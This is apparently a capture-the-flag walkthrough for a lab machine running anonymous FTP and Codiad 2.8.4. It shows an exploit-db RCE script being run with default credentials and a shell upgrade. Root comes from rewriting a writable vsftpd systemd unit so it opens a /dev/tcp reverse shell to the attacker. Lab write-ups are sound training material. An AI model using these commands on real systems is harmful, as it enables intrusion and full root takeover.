As usual, start with an nmap scan to see what the box is running:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| FTP server status:
| Connected to ::ffff:10.8.246.255
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Unix
As we can see, port 21 FTP is open and allows anonymous access. Connect and grab the hidden(?) file …/- (directory name is … and filename is –). You might want to rename the file on your system so it’s easier to work with. Inside it you’ll find 2 possible usernames.
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
It also mentions a default password, let’s find out where that is used. As seen from the nmap scan, there’s an HTTP server running on port 62337. As we can see by the login prompt it’s running Codiad 2.8.4, and searching exploit-db we can find an authenticated RCE exploit for it.
Google for the default credentials for codiad. Use this on the exploit script:
python codiad.py http://MACHINE_IP:62337/ john password YOUR_IP PORT linux
With this we get a shell and can upgrade it to be able to use sudo etc:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Doing some enumeration we see that we can read /home/drac/.bash_history, which includes a password for mysql. Use it to authenticate as drac.
As drac, run sudo -l and notice that we can run ‘/usr/sbin/service vsftpd restart‘ as drac, and that the file ‘/etc/systemd/system/multi-user.target.wants/vsftpd.service‘ can be written to. This will be our PrivEsc vector.
Edit the file to spawn a reverse shell as root:
[Unit] Description=vsftpd FTP server After=network.target [Service] Type=simple User=root ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1' [Install] WantedBy=multi-user.target
You need to reload the systemctl daemon before you can execute the altered script:
After which you can run:
sudo /usr/sbin/service vsftpd restart
and get a reverse shell as root to your netcat listener.